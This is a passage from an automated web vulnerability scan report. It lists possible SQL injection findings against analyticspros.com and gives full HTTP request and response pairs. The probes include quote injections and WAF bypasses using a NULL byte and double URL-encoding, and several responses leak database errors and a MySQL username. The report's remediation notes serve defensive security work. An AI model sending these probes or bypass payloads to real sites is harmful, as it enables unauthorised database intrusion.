Last-Modified: Sat, 06 Nov 2010 06:57:11 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39325


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.26. http://www.analyticspros.com/blog/55-googleanalytics/114-share-advanced-segment-google-analytics.html [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/114-share-advanced-segment-google-analytics.html

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /blog/55-googleanalytics/114-share-advanced-segment-google-analytics.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:57:38 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/114-share-advanced-segment-google-analytics.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:57:39 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.27. http://www.analyticspros.com/blog/55-googleanalytics/122-traning-workshop-washington-dc-2010.html [__utmc cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/122-traning-workshop-washington-dc-2010.html

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/55-googleanalytics/122-traning-workshop-washington-dc-2010.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141'; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:37:01 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/122-traning-workshop-washington-dc-2010.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141''; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:37:03 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:37:04 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:37:04 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 26022


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.28. http://www.analyticspros.com/blog/55-googleanalytics/60-ga-extended-segments-part-1.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/60-ga-extended-segments-part-1.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/55-googleanalytics'/60-ga-extended-segments-part-1.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=30
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:19:56 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics''/60-ga-extended-segments-part-1.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=30
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:19:58 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:19:59 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:19:59 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28840


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.29. http://www.analyticspros.com/blog/55-googleanalytics/60-ga-extended-segments-part-1.html [__utmmobile cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/60-ga-extended-segments-part-1.html

Issue detail

The __utmmobile cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmmobile cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the __utmmobile cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/55-googleanalytics/60-ga-extended-segments-part-1.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=30
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c%2527;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:14:19 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/60-ga-extended-segments-part-1.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=30
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c%2527%2527;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:14:19 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:14:22 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:14:22 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28830


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.30. http://www.analyticspros.com/blog/55-googleanalytics/60-ga-extended-segments-part-1.html [optimizelyEndUserId cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/60-ga-extended-segments-part-1.html

Issue detail

The optimizelyEndUserId cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the optimizelyEndUserId cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the optimizelyEndUserId cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/55-googleanalytics/60-ga-extended-segments-part-1.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169%2527; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:03:23 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/60-ga-extended-segments-part-1.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169%2527%2527; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:03:24 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.31. http://www.analyticspros.com/blog/55-googleanalytics/63-kintiskton-llc-in-google-analytics.html [__utmb cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/63-kintiskton-llc-in-google-analytics.html

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmb cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/55-googleanalytics/63-kintiskton-llc-in-google-analytics.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=30
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937'; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:11:48 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/63-kintiskton-llc-in-google-analytics.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=30
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937''; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:11:48 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:11:49 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:11:50 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35356


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.32. http://www.analyticspros.com/blog/55-googleanalytics/63-kintiskton-llc-in-google-analytics.html [__utmz cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/63-kintiskton-llc-in-google-analytics.html

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the __utmz cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/55-googleanalytics/63-kintiskton-llc-in-google-analytics.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%2527; 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:00:15 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/55-googleanalytics/63-kintiskton-llc-in-google-analytics.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%2527%2527; 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:00:16 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.33. http://www.analyticspros.com/blog/55-googleanalytics/63-kintiskton-llc-in-google-analytics.html [itemid parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/55-googleanalytics/63-kintiskton-llc-in-google-analytics.html

Issue detail

The itemid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the itemid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /blog/55-googleanalytics/63-kintiskton-llc-in-google-analytics.html?itemid=70#comment%00' HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=30
